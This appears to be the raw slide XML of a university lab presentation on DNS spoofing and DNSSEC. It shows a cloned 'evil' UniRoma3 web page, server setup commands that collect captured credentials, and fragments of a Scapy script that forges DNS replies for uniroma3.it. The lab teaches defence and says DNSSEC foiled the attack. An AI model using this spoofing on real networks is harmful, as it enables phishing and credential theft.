          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>view hacker database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7E5F34F-F655-BFB2-C0EB-F21D080ED0E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A44B39C0-D7E6-94B0-1680-D606CC2190EA}"/>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21508" name="Rectangle 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C11E471-2091-6A05-734F-41D7E00CF22F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="6434123"/>
            <a:ext cx="181822"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800" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90512938-EAE3-759D-22FE-BA8D11C3D1E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7148945" y="4314433"/>
            <a:ext cx="4055062" cy="1088840"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -92427"/>
              <a:gd name="adj2" fmla="val -9961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evil's database is empty, DNSSEC worked. The student's credentials were not stolen by the hacker.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3672206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50F57-0FEC-2050-953B-5F16DF3B8A18}"/>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C638C6A4-89C8-9C59-E358-DCCC40B12EA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2390774" y="1925216"/>
            <a:ext cx="7410451" cy="3007568"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="778"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADFA99BB-19AC-5A7B-B94B-00DD0555E31C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>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noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;html&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;head&gt;&lt;title&gt;UniRoma3 Official&lt;/title&gt;&lt;/head&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;body&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;pre&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Hello from UniRoma3!</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noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;/pre&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;/body&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;/html&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53082DD1-4D4E-6ED2-B9E9-231C782B25C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3548" cy="9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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniromatre</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/var/www/html/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>index.php</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A0630ECF-5E2A-138B-B771-1BE4D2E46BBC}"/>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939F22CA-34E4-D865-B623-48C3D2E0C949}"/>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7CEBF5B4-52F5-10F1-5E34-9F8818BACF78}"/>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3813211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5B959-9DF1-0A49-DF61-AFEB50F6B245}"/>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5E1A6A1F-02C4-692A-2A35-ADA832A346F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1373289" y="1697821"/>
            <a:ext cx="9445421" cy="3278950"/>
            <a:chOff x="-1816" y="2644"/>
            <a:chExt cx="9827" cy="2037"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F987A5CA-7E48-539B-C473-9B79F2D892A9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="-1816" y="2758"/>
              <a:ext cx="9827" cy="192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210.0.3.50/24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default via 210.0.3.1</a:t>
              </a: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/var/www/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db</a:t>
              </a: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/var/www/html</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>echo "--- DATABASE CREDENZIALI EVIL ---" &gt; /var/www/html/captured_creds.txt</a:t>
              </a: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/var/www/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db</a:t>
              </a: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www-data:www-data</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /var/www/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db</a:t>
              </a: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777 /var/www/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db</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rm -f /var/www/html/index.html</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>apache2ctl start</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>tail -f /dev/null</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3F2A1518-8AE0-9A6A-0CEF-FD774F396714}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="-1652" y="2644"/>
              <a:ext cx="2215" cy="228"/>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err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil.startup</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0C87D4AC-9CA2-40E4-D04E-B4B0E1F214FF}"/>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DC85C11E-DE78-9788-E7F2-C46657B8EB8A}"/>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9F530052-8002-DC64-1427-0A055FF726B7}"/>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3451214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ABF6F-8E0F-03FD-B397-501A61736BEB}"/>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22784B9E-A263-B19E-8BA1-CB58A3CB0769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1817319" y="1910467"/>
            <a:ext cx="8557361" cy="3037065"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="778"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BDEA8F0-DFB7-C229-5CB6-E7FB33E72B67}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>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noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;html&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;head&gt;&lt;title&gt;UniRoma3 Official&lt;/title&gt;&lt;/head&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;body&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;pre&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ATTENZIONE: SITO CLONE (EVIL)!</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noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;/pre&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;/body&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;/html&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{738FC324-28E5-CF75-2385-A1DA9EA90735}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="2609" cy="9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/evil/var/www/html/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>index.php</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8431E678-E8C6-1246-2409-FE8017D99D59}"/>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8C036AE1-DC91-A60C-B4E7-AF2E04F86D52}"/>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2A219CD0-4D09-23DC-FDF9-A3F76AA9D7D2}"/>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2048634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F0506-F609-BD11-5F78-6411304B9662}"/>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FF1CD7B4-B239-F725-D3E2-9B90E7ED30D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1103922" y="1429205"/>
            <a:ext cx="10478478" cy="4723944"/>
            <a:chOff x="126" y="3327"/>
            <a:chExt cx="5943" cy="759"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF53B5A2-426F-039D-B51C-54B0F49E5784}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3360"/>
              <a:ext cx="5943" cy="726"/>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from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>scapy.all</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> import DNSQR , DNS , IP , UDP , DNSRR , </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>send</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> ,sniff , </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sendp</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EVIL_IP = "210.0.3.50"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>DNS_UNI_IP = "110.0.0.10"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>INTERFACE = "eth0"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>TARGET_DOMAIN = "uniroma3.it"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>def</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dns_spoof</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pkt.haslayer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(DNSQR) and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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> == 0 and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 DNS_UNI_IP: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[DNSQR].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qname.decode</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t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> TARGET_DOMAIN in </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ether_layer</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ip_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = IP(</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udp_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = UDP(sport=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[UDP].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport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dport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[UDP].sport)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dns_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = DNS(</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                id=</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[DNS].id,</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11070368-062C-4EA3-B07D-E3804E0AFD0E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="176" y="3327"/>
              <a:ext cx="1939" cy="50"/>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/r2/r2_attack.py</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319DC315-DE58-8610-FBAC-2A79E7A4CF3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
